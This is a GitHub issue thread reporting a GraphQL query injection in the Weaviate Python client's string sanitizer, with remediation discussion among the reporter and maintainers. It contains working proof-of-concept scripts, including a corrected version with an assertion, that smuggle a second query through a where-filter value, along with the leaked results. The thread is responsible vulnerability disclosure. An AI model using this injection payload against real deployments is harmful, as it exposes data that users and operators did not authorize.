### ISSUE TITLE
graphql query injection

### ISSUE THREAD

**Issue by tardigrade-9** [weaviate/weaviate-python-client#1095]
Due to improper input sanitization, we can query for all the data.

PoC:
Initialize the DB
```
import weaviate
import requests
import json

client = weaviate.Client(
    url = "http://127.0.0.1:8980",  # Replace with your Weaviate endpoint
)
class_obj = {
    "class": "Question",
    "vectorizer": "text2vec-transformers"
}

class_obj2 = {
    "class": "Hacked",
    "vectorizer": "text2vec-transformers"
}
client.schema.create_class(class_obj)
client.schema.create_class(class_obj2)

resp = requests.get('https://raw.githubusercontent.com/weaviate-tutorials/quickstart/main/data/jeopardy_tiny.json')
data = json.loads(resp.text)  # Load data

client.batch.configure(batch_size=100)  # Configure batch
with client.batch as batch:  # Initialize a batch process
    for i, d in enumerate(data):  # Batch import data
        print(f"importing question: {i+1}")
        properties = {
            "answer": d["Answer"],
            "question": d["Question"],
            "category": d["Category"],
        }
        batch.add_data_object(
            data_object=properties,
            class_name="Question"
        )
        batch.add_data_object(
            data_object=properties,
            class_name="Hacked"
        )
```

Query for Question, but payload injects additional query to include results from Hacked
```
import weaviate

client = weaviate.Client(
url = "http://127.0.0.1:8980/", # Replace with your Weaviate endpoint
)

injection_payload = client.query.get("Hacked",["answer"]).build()

injection_template = """
Liver\\"}}){{answer}}}}{payload}#
"""
q = "Liver"
query = (
client.query
.get("Question", ["question", "answer", "category"])
.with_where({
"path": ["answer"],
"operator": "NotEqual",
"valueText": injection_template.format(payload=injection_payload[1:]),
#"valueText": injection_template
})
)

print("final payload="+query.build())
print(query.do())
```

Output:
`{'data': {'Get': {'Hacked': [{'answer': 'the diamondback rattler'}, {'answer': 'DNA'}, {'answer': 'species'}, {'answer': 'Elephant'}, {'answer': 'wire'}, {'answer': 'Liver'}, {'answer': 'Antelope'}, {'answer': 'Sound barrier'}, {'answer': 'the nose or snout'}, {'answer': 'the atmosphere'}], 'Question': [{'answer': 'Sound barrier'}, {'answer': 'the diamondback rattler'}, {'answer': 'wire'}, {'answer': 'the nose or snout'}, {'answer': 'DNA'}, {'answer': 'Antelope'}, {'answer': 'Elephant'}, {'answer': 'species'}, {'answer': 'the atmosphere'}]}}}
`

Remediation:
escape all `"`. util.py:_sanitize_str => re.sub(r'(?<!\\)"', '\\"', value)
change it to 
re.sub(r'"', '\\"', value)

I'll submit a PR shortly with fix, please assign a CVE if possible.

**Comment by dirkkul** [comment]
Hi @tardigrade-9,

thank you for bringing this to our attention, we will merge your fix (after review) and release new versions.

The same fix should apply to:
- main
- stable/v3

if you want you can create a PR to both branches, but I can also do that.

With CVE:
This only applies to v3 style clients (v4 contains a copy for backward compatibility) which are already deprecated. We will discuss internally it this still makes sense

**Comment by tardigrade-9** [comment]
@dirkkul , I did not go through v4 client. If verba is using v4 style client, then it should affect v4 too. I'm able to see same error in verba.
<img width="1267" alt="Screenshot 2024-06-05 at 2 16 56 PM" src="https://github.com/weaviate/weaviate-python-client/assets/55308877/03d3a359-8384-452b-981b-c7230824897c">

You see an error because the result did not contain 'data', but just 'error'.

**Comment by dirkkul** [comment]
verba seems to be using v3: https://github.com/weaviate/Verba/blob/6f8e710dfbd2c3277d1692e4bcaff31a94976894/setup.py#L27

We don't use  GQL for GET in v4

**Comment by tsmith023** [comment]
Hi @tardigrade-9, I've attempted to replicate the issue you're seeing but I cannot seem to observe the behaviour that you report above. I've made a [draft PR](https://github.com/weaviate/weaviate-python-client/pull/1134) where I add your MRE above as a test and the test is failing (you can ignore the failing type tests for now, it's the integration tests that matter here)

I also tried to play with the query using Insomnia and cannot observe the above issue:

<img width="1313" alt="Screenshot 2024-06-28 at 13 33 49" src="https://github.com/weaviate/weaviate-python-client/assets/66489849/e99d3bd0-b326-4605-824e-953f60636202">

I'll close this issue for now as `can't repro` but if you can get a functioning MRE then we'd happily revisit the issue!
Cheers 😁

**Comment by adamleko** [comment]
This is still an issue. The example PoC code above was mostly correct but the escaping on the injection template was missing a slash.

I updated the example added in #1134 with the fixed slash and now the assertion passes:

```python
import weaviate
import requests
import json

client = weaviate.Client(
    url="http://localhost:8080",  # Replace with your Weaviate endpoint
)
client.schema.delete_class("Question")
client.schema.delete_class("Hacked")
class_obj = {
    "class": "Question",
    "vectorizer": "text2vec-transformers",
    "properties": [
        {"name": "answer", "dataType": ["string"], "tokenization": "field"},
        {"name": "question", "dataType": ["string"]},
        {"name": "category", "dataType": ["string"]},
    ],
}

class_obj2 = {
    "class": "Hacked",
    "vectorizer": "text2vec-transformers",
    "properties": [
        {"name": "answer", "dataType": ["string"]},
        {"name": "question", "dataType": ["string"]},
        {"name": "category", "dataType": ["string"]},
    ],
}
client.schema.create_class(class_obj)
client.schema.create_class(class_obj2)

resp = requests.get(
    "https://raw.githubusercontent.com/weaviate-tutorials/quickstart/main/data/jeopardy_tiny.json"
)
data = json.loads(resp.text)  # Load data

client.batch.configure(batch_size=100)  # Configure batch
with client.batch as batch:  # Initialize a batch process
    for i, d in enumerate(data):  # Batch import data
        print(f"importing question: {i+1}")
        properties = {
            "answer": d["Answer"],
            "question": d["Question"],
            "category": d["Category"],
        }
        batch.add_data_object(data_object=properties, class_name="Question")
        batch.add_data_object(data_object=properties, class_name="Hacked")

injection_payload = client.query.get("Hacked", ["answer"]).build()
print(injection_payload)


injection_template = """
Liver\\\\"}}){{answer}}}}{payload}#
"""
query = client.query.get("Question", ["question", "answer", "category"]).with_where(
    {
        "path": ["answer"],
        "operator": "NotEqual",
        "valueText": injection_template.format(payload=injection_payload[1:]),
    }
)
print(f"Resulting injected query: {query.build()}\n")
res = query.do()
print(f"Query results: {res}")
assert "Hacked" in res["data"]["Get"]
```

Testing with Insomnia is insufficient as the problem lies with how the GQL is generated on the client side, not with how the GQL is parsed on the server side.

**Comment by adamleko** [comment]
That fragment above was tested against `weaviate-client==4.6.5`, but I think the issue is present in any version of the client library that uses the current `_sanitize_str` implementation with the GQL API.

Also, while the GQL-based client API is deprecated, the latest available client ships with vulnerable code, which likely means this issue warrants a CVE. If this issue isn't going to be fixed, that older code should either be removed or the deprecation warning needs to use stronger language indicating the older "v3" API has known security/escaping issues.

The fix in #1101 _does_ seem to address this so hopefully it will be low effort to include in the next release.

**Comment by tsmith023** [comment]
@adamleko, we will be releasing a patch version of the `v3` client that includes this fix. Likewise, it will also be added to the `v4` client since, as you say, the vulnerability is present in that version too. Thanks again for your help in diagnosing and reporting the issue!
